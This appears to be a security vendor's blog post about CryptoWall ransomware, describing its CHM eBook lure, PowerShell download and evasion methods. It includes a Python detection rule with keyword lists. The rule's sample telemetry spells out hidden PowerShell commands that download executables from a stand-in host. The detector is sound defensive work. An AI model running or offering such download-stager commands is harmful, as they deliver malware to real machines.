New CryptoWall Ransomware Holds User Information Hostage


Ransomware is a particularly heinous type of malware that abducts a user's files and personal data and holds them for ransom, demanding hundreds to thousands of dollars for their return. If the victims refuse to pay up within a set timeframe, the ransomware keeps their files locked up forever. Ransomware has been around for quite a while, with the first such program having been sighted in the late 1980s. Unfortunately, cybercriminals have only gotten more tech savvy as the years have gone by. The most recently reported case of ransomware is a Trojan called “CryptoWall”, and it’s worse than ever before.

CryptoWall is more or less an upgraded version of CryptoLocker, which first hit the scene in 2013. CryptoLocker originally worked by encrypting users’ files, then demanding that the victims pay USD $300 within 72 hours for a unique decryption key; otherwise, the key would be destroyed, and the users’ files would forever remain encrypted and inaccessible. CryptoWall differs from CryptoLocker in three important ways: first, it uses Tor in an attempt to hide its “command and control infrastructure”; second, it disguises itself as an eBook using the Microsoft CHM file type extension; third, and perhaps most nefariously, it demands much more ransom money from its victims. How much, you ask? Victims of CryptoWall have been requested to pay an unbelievable USD $10,000 in Bitcoin to get their files back. Cumulatively, CryptoWall victims have paid over USD $18 million in ransom over the past year alone.

Figure 1. The CryptoWall 3.0 introductory screen.

Because the Microsoft CHM eBook format is a file type that appears harmless, users are quick to relax and let their guard down. Opening the file then downloads the malware through Microsoft powershell.exe, which effectively shields CryptoWall from detection by antivirus software. In addition to using Microsoft file formats and software to hide itself, this new ransomware uses various other means to evade security software scans. For example, it might host the virus on the well-known file sharing website MediaFire, or use a trusted digital signature to bypass detection by security software.
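The CHM-to-PowerShell download chain described above leaves a recognisable trace in process-creation telemetry. The following Python rule is an added example (not code from the original post or from Baidu): it assumes the .chm lure is opened by Windows' HTML Help viewer (hh.exe) and that events carry Sysmon-style parent image, image and command line fields; the sample events are constructed.

```python
import ntpath
from dataclasses import dataclass
from typing import List, Optional, Tuple

@dataclass
class ProcessEvent:
    """One process-creation record (Sysmon Event ID 1 style fields)."""
    parent_image: str
    image: str
    command_line: str

# Keywords typical of a PowerShell download stager / hidden console (assumed list).
DOWNLOAD_HINTS = ("downloadfile", "downloadstring", "invoke-webrequest", "net.webclient")
HIDDEN_HINTS = ("-w hidden", "-windowstyle hidden", "-nop", "-noprofile")

def classify(ev: ProcessEvent) -> Optional[Tuple[str, str]]:
    """Return (severity, reason) when the event matches, otherwise None."""
    parent = ntpath.basename(ev.parent_image).lower()
    child = ntpath.basename(ev.image).lower()
    if child != "powershell.exe":
        return None
    cmd = ev.command_line.lower()
    # hh.exe is the Windows HTML Help viewer that renders .chm files; a help
    # file has no legitimate reason to launch a shell, so this alone is high.
    if parent == "hh.exe":
        return ("high", "CHM viewer (hh.exe) spawned powershell.exe")
    if any(h in cmd for h in DOWNLOAD_HINTS) and any(h in cmd for h in HIDDEN_HINTS):
        return ("medium", "hidden PowerShell window running a download cmdlet")
    return None

def scan(events: List[ProcessEvent]) -> List[Tuple[str, str]]:
    """Run classify() over a batch and keep only the findings."""
    return [r for r in (classify(ev) for ev in events) if r is not None]

# Constructed sample telemetry (not real captures).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\hh.exe",
                 r'"C:\Windows\hh.exe" C:\Users\alice\Downloads\free_ebook.chm'),
    ProcessEvent(r"C:\Windows\hh.exe", PS,
                 "powershell.exe -w hidden -nop -c (New-Object Net.WebClient)"
                 ".DownloadFile('http://example.invalid/u.bin','%TEMP%\\u.exe')"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", PS,
                 r"powershell.exe -File C:\ops\rotate-logs.ps1"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", PS,
                 "powershell -WindowStyle Hidden Invoke-WebRequest http://example.invalid/a -OutFile a.exe"),
]

if __name__ == "__main__":
    for severity, reason in scan(SAMPLE_EVENTS):
        print(severity, reason)
```

The hh.exe parent check is the high-confidence signal; the keyword heuristic is only a fallback and will need tuning against your environment's legitimate scripts.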

Figure 2. CryptoWall uses recognized digital signatures to bypass detection.

To avoid the malicious encryption of your personal information and files, the Baidu Antivirus Security Center would like to remind users to install multi-functional security software and enable its real-time defense function so they are protected from all kinds of online threats. Users already infected with malicious ransomware can use Baidu Antivirus 2015's Quick Scan feature for a security health check before removing any potentially dangerous programs. CryptoWall is not the only ransomware threat floating around on the Internet; the Baidu Antivirus Security Center previously reported on CTB Locker, and we would like to take this opportunity to remind all users to remain vigilant about that threat as well.
Figure 3. Baidu Antivirus 2015 successfully detects a ransomware threat.

Download Baidu Antivirus – the best free antivirus – here.